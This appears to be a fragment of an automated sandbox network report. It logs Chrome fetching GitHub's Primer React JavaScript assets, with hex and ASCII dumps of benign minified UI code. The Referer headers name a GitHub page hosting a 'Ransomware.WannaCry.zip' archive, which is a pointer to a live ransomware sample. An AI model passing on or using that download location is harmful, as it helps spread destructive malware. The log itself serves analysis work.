                                                                                      Data Ascii: ement("span",{className:"TextInput-icon"},e):null;a.displayName="TextInputInnerVisualSlot"},20682:(e,t,n)=>{n.d(t,{FD:()=>u,Qk:()=>d,ZP:()=>f});var i=n(15388),r=n(27999),o=n(42379),a=n(15173);let l=(0,r.bU)({variants:{small:{minHeight:"28px",px:2,py:"3px"
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 72 65 61 7b 70 61 64 64 69 6e 67 3a 22 2c 22 3b 7d 22 2c 22 20 22 2c 22 20 22 2c 22 20 22 2c 22 20 22 2c 22 20 22 2c 22 20 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 22 2c 22 29 7b 66 6f 6e 74 2d 73 69 7a 65 3a 22 2c 22 3b 7d 22 2c 22 20 22 2c 22 20 22 2c 22 20 22 2c 22 20 22 2c 22 20 22 2c 22 3b 22 5d 2c 28 30 2c 6f 2e 55 32 29 28 22 66 6f 6e 74 53 69 7a 65 73 2e 31 22 29 2c 28 30 2c 6f 2e 55 32 29 28 22 63 6f 6c 6f 72 73 2e 66 67 2e 64 65 66 61 75 6c 74 22 29 2c 28 30 2c 6f 2e 55 32 29 28 22 63 6f 6c 6f 72 73 2e 63 61 6e 76 61 73 2e 64 65 66 61 75 6c 74 22 29 2c 28 30 2c 6f 2e 55 32 29 28 22 63 6f 6c 6f 72 73 2e 62 6f 72 64 65 72 2e 64 65 66 61 75 6c 74 22 29 2c 28 30 2c 6f 2e 55 32 29 28 22 72 61 64 69 69 2e 32 22 29 2c 28 30 2c 6f 2e 55 32
                                                                                      Data Ascii: rea{padding:",";}"," "," "," "," "," "," @media (min-width:","){font-size:",";}"," "," "," "," "," ",";"],(0,o.U2)("fontSizes.1"),(0,o.U2)("colors.fg.default"),(0,o.U2)("colors.canvas.default"),(0,o.U2)("colors.border.default"),(0,o.U2)("radii.2"),(0,o.U2


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      52192.168.2.1649756185.199.109.1544436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:24 UTC704OUTGET /assets/vendors-node_modules_primer_react_lib-esm_FormControl_FormControl_js-f17f2abffb7f.js HTTP/1.1
                                                                                      Host: github.githubassets.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      Origin: https://github.com
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: script
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:24 UTC687INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 33385
                                                                                      Cache-Control: public, max-age=31536000, immutable
                                                                                      Content-Type: application/javascript
                                                                                      Last-Modified: Wed, 13 Mar 2024 16:24:33 GMT
                                                                                      ETag: 0x8DC437A1155F8EC
                                                                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:24 GMT
                                                                                      Age: 770256
                                                                                      X-Served-By: cache-iad-kjyo7100113-IAD, cache-ewr18165-EWR
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 511, 1
                                                                                      Vary: Accept-Encoding
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Fastly-Request-ID: 900a3ba3a038d36f597a64d5aee24cb0aef65fcb
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 3d 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 70 72 69 6d 65 72 5f 72 65 61 63 74 5f 6c 69 62 2d 65 73 6d 5f 46 6f 72 6d 43 6f 6e 74 72 6f 6c 5f 46 6f 72 6d 43 6f 6e 74 72 6f 6c 5f 6a 73 22 5d 2c 7b 31 33 32 37 35 3a 28 65 2c 74 2c 61 29 3d 3e 7b 61 2e 64 28 74 2c 7b 7a 3a 28 29 3d 3e 72 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 72 28 65 2c 74 2c 7b 64 69 72 65 63 74 69 6f 6e 3a 61 3d 22 76 65 72 74 69 63 61 6c 22 2c 73 74 61 72 74 4d 61 72 67 69 6e 3a 72 3d 30 2c 65 6e 64 4d 61 72 67 69 6e 3a 6e 3d 30 2c 62 65 68 61 76 69
                                                                                      Data Ascii: "use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["vendors-node_modules_primer_react_lib-esm_FormControl_FormControl_js"],{13275:(e,t,a)=>{a.d(t,{z:()=>r});function r(e,t,{direction:a="vertical",startMargin:r=0,endMargin:n=0,behavi
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 6c 6c 62 61 63 6b 29 28 65 3d 3e 7b 74 26 26 74 28 65 29 2c 43 28 21 30 29 7d 2c 5b 74 2c 43 5d 29 2c 6a 3d 28 30 2c 72 2e 75 73 65 43 61 6c 6c 62 61 63 6b 29 28 65 3d 3e 7b 61 26 26 61 28 65 29 2c 4e 28 28 29 3d 3e 7b 64 6f 63 75 6d 65 6e 74 2e 61 63 74 69 76 65 45 6c 65 6d 65 6e 74 21 3d 3d 78 2e 63 75 72 72 65 6e 74 26 26 43 28 21 31 29 7d 2c 30 29 7d 2c 5b 61 2c 43 2c 78 2c 4e 5d 29 2c 41 3d 28 30 2c 72 2e 75 73 65 43 61 6c 6c 62 61 63 6b 29 28 65 3d 3e 7b 64 26 26 64 28 65 29 2c 4d 28 65 2e 63 75 72 72 65 6e 74 54 61 72 67 65 74 2e 76 61 6c 75 65 29 2c 6b 7c 7c 43 28 21 30 29 7d 2c 5b 64 2c 4d 2c 43 2c 6b 5d 29 2c 44 3d 28 30 2c 72 2e 75 73 65 43 61 6c 6c 62 61 63 6b 29 28 65 3d 3e 7b 76 61 72 20 74 3b 63 26 26 63 28 65 29 2c 22 42 61 63 6b 73 70 61
                                                                                      Data Ascii: llback)(e=>{t&&t(e),C(!0)},[t,C]),j=(0,r.useCallback)(e=>{a&&a(e),N(()=>{document.activeElement!==x.current&&C(!1)},0)},[a,C,x,N]),A=(0,r.useCallback)(e=>{d&&d(e),M(e.currentTarget.value),k||C(!0)},[d,M,C,k]),D=(0,r.useCallback)(e=>{var t;c&&c(e),"Backspa
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 28 76 61 72 20 74 3d 31 3b 74 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 74 2b 2b 29 7b 76 61 72 20 61 3d 61 72 67 75 6d 65 6e 74 73 5b 74 5d 3b 66 6f 72 28 76 61 72 20 72 20 69 6e 20 61 29 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 61 2c 72 29 26 26 28 65 5b 72 5d 3d 61 5b 72 5d 29 7d 72 65 74 75 72 6e 20 65 7d 29 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 6c 65 74 20 79 3d 65 3d 3e 28 74 2c 61 29 3d 3e 65 28 74 29 3d 3d 3d 65 28 61 29 3f 30 3a 65 28 74 29 3f 2d 31 3a 31 2c 78 3d 7b 73 74 61 72 74 4d 61 72 67 69 6e 3a 30 2c 65 6e 64 4d 61 72 67 69 6e 3a 38 7d 2c 77 3d 28 65 2c 74 29 3d 3e 74 2e 69 6e 63 6c 75 64 65 73 28 65 29 3b 66 75 6e 63 74 69 6f
                                                                                      Data Ascii: (var t=1;t<arguments.length;t++){var a=arguments[t];for(var r in a)Object.prototype.hasOwnProperty.call(a,r)&&(e[r]=a[r])}return e}).apply(this,arguments)}let y=e=>(t,a)=>e(t)===e(a)?0:e(t)?-1:1,x={startMargin:0,endMargin:8},w=(e,t)=>t.includes(e);functio
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 5b 46 2c 49 2c 4e 2c 6c 2c 56 2c 7a 2c 64 2c 4d 2c 45 5d 29 2c 4a 3d 28 30 2c 72 2e 75 73 65 4d 65 6d 6f 29 28 28 29 3d 3e 42 2e 72 65 64 75 63 65 28 28 65 2c 74 2c 61 29 3d 3e 28 65 5b 74 5d 3d 61 2c 65 29 2c 7b 7d 29 2c 5b 42 5d 29 2c 71 3d 28 30 2c 72 2e 75 73 65 4d 65 6d 6f 29 28 28 29 3d 3e 48 2e 66 69 6c 74 65 72 28 54 7c 7c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 61 3b 72 65 74 75 72 6e 21 21 28 6e 75 6c 6c 3d 3d 3d 28 61 3d 65 2e 74 65 78 74 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 61 3f 76 6f 69 64 20 30 3a 61 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2e 73 74 61 72 74 73 57 69 74 68 28 6f 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 29 7d 29 2e 73 6f 72 74 28 28 65 2c 74 29 3d 3e 4a 5b 65 2e 69 64 5d 2d 4a 5b 74 2e 69 64 5d 29 2c 5b 48
                                                                                      Data Ascii: [F,I,N,l,V,z,d,M,E]),J=(0,r.useMemo)(()=>B.reduce((e,t,a)=>(e[t]=a,e),{}),[B]),q=(0,r.useMemo)(()=>H.filter(T||function(e,t){var a;return!!(null===(a=e.text)||void 0===a?void 0:a.toLowerCase().startsWith(o.toLowerCase()))}).sort((e,t)=>J[e.id]-J[t.id]),[H
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 31 29 74 68 72 6f 77 20 45 72 72 6f 72 28 27 41 75 74 6f 63 6f 6d 70 6c 65 74 65 3a 20 73 65 6c 65 63 74 69 6f 6e 56 61 72 69 61 6e 74 20 22 73 69 6e 67 6c 65 22 20 63 61 6e 6e 6f 74 20 62 65 20 75 73 65 64 20 77 69 74 68 20 6d 75 6c 74 69 70 6c 65 20 73 65 6c 65 63 74 65 64 20 69 74 65 6d 73 27 29 3b 72 65 74 75 72 6e 20 72 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 62 2e 5a 2c 7b 69 73 56 69 73 69 62 6c 65 3a 5a 7d 2c 44 3f 72 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 6d 2e 5a 2c 7b 70 3a 33 2c 64 69 73 70 6c 61 79 3a 22 66 6c 65 78 22 2c 6a 75 73 74 69 66 79 43 6f 6e 74 65 6e 74 3a 22 63 65 6e 74 65 72 22 7d 2c 72 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 67 2e 5a 2c 6e 75 6c 6c 29 29 3a 72 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69
                                                                                      Data Ascii: 1)throw Error('Autocomplete: selectionVariant "single" cannot be used with multiple selected items');return r.createElement(b.Z,{isVisible:Z},D?r.createElement(m.Z,{p:3,display:"flex",justifyContent:"center"},r.createElement(g.Z,null)):r.createElement("di
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 6f 74 74 6f 6d 22 2c 61 6c 69 67 6e 3a 22 73 74 61 72 74 22 2c 61 6e 63 68 6f 72 45 6c 65 6d 65 6e 74 52 65 66 3a 65 7c 7c 64 7d 2c 5b 6d 2c 75 5d 29 3b 28 30 2c 6c 2e 7a 29 28 63 2c 67 29 3b 6c 65 74 20 76 3d 28 30 2c 72 2e 75 73 65 43 61 6c 6c 62 61 63 6b 29 28 28 29 3d 3e 7b 70 28 21 31 29 7d 2c 5b 70 5d 29 3b 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 6e 75 6c 6c 3a 6d 3f 72 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 43 2e 5a 50 2c 6b 28 7b 72 65 74 75 72 6e 46 6f 63 75 73 52 65 66 3a 64 2c 70 72 65 76 65 6e 74 46 6f 63 75 73 4f 6e 4f 70 65 6e 3a 21 30 2c 6f 6e 43 6c 69 63 6b 4f 75 74 73 69 64 65 3a 76 2c 6f 6e 45 73 63 61 70 65 3a 76 2c 72 65 66 3a 67 2c 74 6f 70 3a 6e 75 6c 6c 3d 3d 66 3f 76
                                                                                      Data Ascii: ottom",align:"start",anchorElementRef:e||d},[m,u]);(0,l.z)(c,g);let v=(0,r.useCallback)(()=>{p(!1)},[p]);return"undefined"==typeof window?null:m?r.createElement(C.ZP,k({returnFocusRef:d,preventFocusOnOpen:!0,onClickOutside:v,onEscape:v,ref:g,top:null==f?v
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 65 63 74 65 64 49 74 65 6d 4c 65 6e 67 74 68 22 2c 70 61 79 6c 6f 61 64 3a 65 7d 29 7d 2c 5b 5d 29 2c 78 3d 28 30 2c 66 2e 4d 29 28 74 29 3b 72 65 74 75 72 6e 20 72 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 6e 2e 50 72 6f 76 69 64 65 72 2c 7b 76 61 6c 75 65 3a 7b 61 63 74 69 76 65 44 65 73 63 65 6e 64 61 6e 74 52 65 66 3a 61 2c 61 75 74 6f 63 6f 6d 70 6c 65 74 65 53 75 67 67 65 73 74 69 6f 6e 3a 75 2c 69 64 3a 78 2c 69 6e 70 75 74 52 65 66 3a 6c 2c 69 6e 70 75 74 56 61 6c 75 65 3a 64 2c 69 73 4d 65 6e 75 44 69 72 65 63 74 6c 79 41 63 74 69 76 61 74 65 64 3a 70 2c 73 63 72 6f 6c 6c 43 6f 6e 74 61 69 6e 65 72 52 65 66 3a 69 2c 73 65 6c 65 63 74 65 64 49 74 65 6d 4c 65 6e 67 74 68 3a 6d 2c 73 65 74 41 75 74 6f 63 6f 6d 70 6c 65 74 65 53 75 67 67 65 73 74
                                                                                      Data Ascii: ectedItemLength",payload:e})},[]),x=(0,f.M)(t);return r.createElement(n.Provider,{value:{activeDescendantRef:a,autocompleteSuggestion:u,id:x,inputRef:l,inputValue:d,isMenuDirectlyActivated:p,scrollContainerRef:i,selectedItemLength:m,setAutocompleteSuggest
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 4e 32 5a 79 49 2b 43 6a 78 77 59 58 52 6f 49 47 5a 70 62 47 77 74 63 6e 56 73 5a 54 30 69 5a 58 5a 6c 62 6d 39 6b 5a 43 49 67 59 32 78 70 63 43 31 79 64 57 78 6c 50 53 4a 6c 64 6d 56 75 62 32 52 6b 49 69 42 6b 50 53 4a 4e 4d 54 45 75 4e 7a 67 77 4d 79 41 77 4c 6a 49 78 4f 54 59 79 4e 55 4d 78 4d 53 34 35 4d 6a 45 67 4d 43 34 7a 4e 6a 41 30 4d 6a 63 67 4d 54 49 67 4d 43 34 31 4e 54 45 7a 4d 44 55 67 4d 54 49 67 4d 43 34 33 4e 54 41 7a 4d 54 4e 44 4d 54 49 67 4d 43 34 35 4e 44 6b 7a 4d 6a 45 67 4d 54 45 75 4f 54 49 78 49 44 45 75 4d 54 51 77 4d 54 6b 67 4d 54 45 75 4e 7a 67 77 4d 79 41 78 4c 6a 49 34 4d 55 77 30 4c 6a 55 78 4f 44 59 67 4f 43 34 31 4e 44 41 30 4d 6b 4d 30 4c 6a 4d 33 4e 7a 63 31 49 44 67 75 4e 6a 67 78 49 44 51 75 4d 54 67 32 4f 44 49 67 4f
                                                                                      Data Ascii: N2ZyI+CjxwYXRoIGZpbGwtcnVsZT0iZXZlbm9kZCIgY2xpcC1ydWxlPSJldmVub2RkIiBkPSJNMTEuNzgwMyAwLjIxOTYyNUMxMS45MjEgMC4zNjA0MjcgMTIgMC41NTEzMDUgMTIgMC43NTAzMTNDMTIgMC45NDkzMjEgMTEuOTIxIDEuMTQwMTkgMTEuNzgwMyAxLjI4MUw0LjUxODYgOC41NDA0MkM0LjM3Nzc1IDguNjgxIDQuMTg2ODIgO
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 63 65 64 2d 63 6f 6c 6f 72 73 3a 61 63 74 69 76 65 29 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 63 61 6e 76 61 73 74 65 78 74 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 63 61 6e 76 61 73 74 65 78 74 3b 7d 7d 26 3a 69 6e 64 65 74 65 72 6d 69 6e 61 74 65 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 22 2c 22 3b 26 3a 3a 62 65 66 6f 72 65 7b 6d 61 73 6b 2d 69 6d 61 67 65 3a 75 72 6c 28 27 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 33 61 57 52 30 61 44 30 69 4d 54 41 69 49 47 68 6c 61 57 64 6f 64 44 30 69 4d 69 49 67 64 6d 6c 6c 64 30 4a 76 65 44 30 69 4d 43 41 77 49 44 45 77 49 44 49 69 49 47 5a 70 62 47 77 39 49 6d 35 76 62 6d 55 69 49 48 68 74 62 47 35 7a 50 53 4a 6f 64 48 52 77 4f 69 38 76 64 33 64
                                                                                      Data Ascii: ced-colors:active){background-color:canvastext;border-color:canvastext;}}&:indeterminate{background:",";&::before{mask-image:url('data:image/svg+xml;base64,PHN2ZyB3aWR0aD0iMTAiIGhlaWdodD0iMiIgdmlld0JveD0iMCAwIDEwIDIiIGZpbGw9Im5vbmUiIHhtbG5zPSJodHRwOi8vd3d
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 2d 63 68 65 63 6b 65 64 22 2c 65 2e 63 68 65 63 6b 65 64 3f 22 74 72 75 65 22 3a 22 66 61 6c 73 65 22 29 29 7d 29 2c 6e 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 6d 2c 70 28 7b 74 79 70 65 3a 22 63 68 65 63 6b 62 6f 78 22 2c 64 69 73 61 62 6c 65 64 3a 72 2c 72 65 66 3a 62 2c 63 68 65 63 6b 65 64 3a 21 61 26 26 65 2c 64 65 66 61 75 6c 74 43 68 65 63 6b 65 64 3a 74 2c 73 78 3a 64 2c 72 65 71 75 69 72 65 64 3a 63 2c 22 61 72 69 61 2d 72 65 71 75 69 72 65 64 22 3a 63 3f 22 74 72 75 65 22 3a 22 66 61 6c 73 65 22 2c 22 61 72 69 61 2d 69 6e 76 61 6c 69 64 22 3a 22 65 72 72 6f 72 22 3d 3d 3d 75 3f 22 74 72 75 65 22 3a 22 66 61 6c 73 65 22 2c 6f 6e 43 68 61 6e 67 65 3a 65 3d 3e 7b 68 2e 6f 6e 43 68 61 6e 67 65 26 26 68 2e 6f 6e 43 68 61 6e 67 65 28 65 29 2c 6f
                                                                                      Data Ascii: -checked",e.checked?"true":"false"))}),n.createElement(m,p({type:"checkbox",disabled:r,ref:b,checked:!a&&e,defaultChecked:t,sx:d,required:c,"aria-required":c?"true":"false","aria-invalid":"error"===u?"true":"false",onChange:e=>{h.onChange&&h.onChange(e),o


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      53192.168.2.1649757185.199.109.1544436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:24 UTC702OUTGET /assets/vendors-node_modules_primer_react_lib-esm_ActionMenu_ActionMenu_js-eaf74522e470.js HTTP/1.1
                                                                                      Host: github.githubassets.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      Origin: https://github.com
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: script
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:24 UTC687INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 9263
                                                                                      Cache-Control: public, max-age=31536000, immutable
                                                                                      Content-Type: application/javascript
                                                                                      Last-Modified: Fri, 16 Feb 2024 05:20:05 GMT
                                                                                      ETag: 0x8DC2EAEEF5490AF
                                                                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:24 GMT
                                                                                      Age: 1846317
                                                                                      X-Served-By: cache-iad-kcgs7200044-IAD, cache-ewr18171-EWR
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 268, 1
                                                                                      Vary: Accept-Encoding
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Fastly-Request-ID: 69763497af4ae2146d6e4cfc1a3707d48afedc41
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 3d 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 70 72 69 6d 65 72 5f 72 65 61 63 74 5f 6c 69 62 2d 65 73 6d 5f 41 63 74 69 6f 6e 4d 65 6e 75 5f 41 63 74 69 6f 6e 4d 65 6e 75 5f 6a 73 22 5d 2c 7b 34 38 38 35 38 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 6c 65 74 20 72 3b 6e 2e 64 28 74 2c 7b 65 3a 28 29 3d 3e 66 75 6e 63 74 69 6f 6e 20 65 28 74 2c 6e 2c 6f 29 7b 6c 65 74 20 75 3b 6c 65 74 20 61 3d 6e 65 77 20 41 62 6f 72 74 43 6f 6e 74 72 6f 6c 6c 65 72 2c 63 3d 6e 75 6c 6c 21 3d 6f 3f 6f 3a 61 2e 73 69 67 6e 61 6c 3b 74 2e 73 65
                                                                                      Data Ascii: "use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["vendors-node_modules_primer_react_lib-esm_ActionMenu_ActionMenu_js"],{48858:(e,t,n)=>{let r;n.d(t,{e:()=>function e(t,n,o){let u;let a=new AbortController,c=null!=o?o:a.signal;t.se
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 6c 69 63 65 28 72 2c 31 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 6c 65 74 20 74 3d 69 2e 70 6f 70 28 29 3b 74 26 26 65 28 74 2e 63 6f 6e 74 61 69 6e 65 72 2c 74 2e 69 6e 69 74 69 61 6c 46 6f 63 75 73 2c 74 2e 6f 72 69 67 69 6e 61 6c 53 69 67 6e 61 6c 29 7d 28 29 7d 29 2c 64 6f 63 75 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 66 6f 63 75 73 22 2c 65 3d 3e 7b 66 28 65 2e 74 61 72 67 65 74 29 7d 2c 7b 73 69 67 6e 61 6c 3a 76 2e 73 69 67 6e 61 6c 2c 63 61 70 74 75 72 65 3a 21 30 7d 29 2c 66 28 64 6f 63 75 6d 65 6e 74 2e 61 63 74 69 76 65 45 6c 65 6d 65 6e 74 29 2c 72 3d 7b 63 6f 6e 74 61 69 6e 65 72 3a 74 2c 63 6f 6e 74 72 6f 6c 6c 65 72 3a 76 2c 69 6e 69 74 69 61 6c 46 6f 63 75 73 3a 6e 2c 6f 72 69 67 69 6e 61 6c 53 69 67 6e 61 6c 3a
                                                                                      Data Ascii: lice(r,1),function(){let t=i.pop();t&&e(t.container,t.initialFocus,t.originalSignal)}()}),document.addEventListener("focus",e=>{f(e.target)},{signal:v.signal,capture:!0}),f(document.activeElement),r={container:t,controller:v,initialFocus:n,originalSignal:
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 21 65 7c 7c 21 6e 2e 63 75 72 72 65 6e 74 29 72 65 74 75 72 6e 3b 6c 65 74 20 74 3d 6e 2e 63 75 72 72 65 6e 74 2c 72 3d 5b 2e 2e 2e 28 30 2c 61 2e 68 54 29 28 74 29 5d 3b 72 2e 6d 61 70 28 65 3d 3e 7b 76 61 72 20 74 3b 69 66 28 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 61 72 69 61 2d 6b 65 79 73 68 6f 72 74 63 75 74 73 22 29 29 72 65 74 75 72 6e 3b 6c 65 74 20 6e 3d 6e 75 6c 6c 3d 3d 3d 28 74 3d 65 2e 74 65 78 74 43 6f 6e 74 65 6e 74 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 74 3f 76 6f 69 64 20 30 3a 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5b 30 5d 3b 6e 26 26 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 61 72 69 61 2d 6b 65 79 73 68 6f 72 74 63 75 74 73 22 2c 6e 29 7d 29 7d 2c 5b 65 2c 6e 5d 29 2c 72 2e 75 73 65 45 66 66 65 63 74 28 66 75 6e 63
                                                                                      Data Ascii: !e||!n.current)return;let t=n.current,r=[...(0,a.hT)(t)];r.map(e=>{var t;if(e.getAttribute("aria-keyshortcuts"))return;let n=null===(t=e.textContent)||void 0===t?void 0:t.toLowerCase()[0];n&&e.setAttribute("aria-keyshortcuts",n)})},[e,n]),r.useEffect(func
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 72 72 6f 77 44 6f 77 6e 22 3d 3d 3d 74 2e 6b 65 79 29 7b 6c 65 74 20 65 3d 6e 2e 6e 65 78 74 28 29 2e 76 61 6c 75 65 3b 73 65 74 54 69 6d 65 6f 75 74 28 28 29 3d 3e 6e 75 6c 6c 3d 3d 65 3f 76 6f 69 64 20 30 3a 65 2e 66 6f 63 75 73 28 29 29 7d 65 6c 73 65 20 69 66 28 22 41 72 72 6f 77 55 70 22 3d 3d 3d 74 2e 6b 65 79 29 7b 6c 65 74 20 65 3d 5b 2e 2e 2e 6e 5d 2c 74 3d 65 5b 65 2e 6c 65 6e 67 74 68 2d 31 5d 3b 73 65 74 54 69 6d 65 6f 75 74 28 28 29 3d 3e 74 2e 66 6f 63 75 73 28 29 29 7d 7d 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 6c 7c 7c 6c 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6b 65 79 64 6f 77 6e 22 2c 69 29 2c 28 29 3d 3e 6e 75 6c 6c 3d 3d 6c 3f 76 6f 69 64 20 30 3a 6c 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6b 65 79
                                                                                      Data Ascii: rrowDown"===t.key){let e=n.next().value;setTimeout(()=>null==e?void 0:e.focus())}else if("ArrowUp"===t.key){let e=[...n],t=e[e.length-1];setTimeout(()=>t.focus())}};return null==l||l.addEventListener("keydown",i),()=>null==l?void 0:l.addEventListener("key
